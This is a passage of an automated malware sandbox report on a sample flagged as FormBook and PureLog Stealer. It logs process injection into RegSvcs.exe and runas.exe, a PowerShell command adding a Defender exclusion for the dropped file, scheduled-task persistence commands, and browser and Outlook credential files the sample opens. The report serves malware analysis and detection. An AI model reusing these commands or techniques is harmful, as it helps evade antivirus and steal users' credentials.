                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtTerminateThread: Direct from: 0x77377B2EJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeSection loaded: NULL target: C:\Windows\SysWOW64\runas.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\runas.exeThread register set: target process: 6704Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\runas.exeThread APC queued: target process: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeJump to behavior
                Uses runas.exe to run programs with evaluated privileges
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D84008Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
                Source: hAtMBptzWt.exe, 00000010.00000002.3355437210.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000000.2407589173.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354934294.00000000017A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: hAtMBptzWt.exe, 00000010.00000002.3355437210.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000000.2407589173.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354934294.00000000017A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: hAtMBptzWt.exe, 00000010.00000002.3355437210.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000000.2407589173.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354934294.00000000017A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: hAtMBptzWt.exe, 00000010.00000002.3355437210.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000010.00000000.2407589173.00000000015B0000.00000002.00000001.00040000.00000000.sdmp, hAtMBptzWt.exe, 00000014.00000002.3354934294.00000000017A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Users\user\AppData\Roaming\GDhinOc.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2183096912.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\runas.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
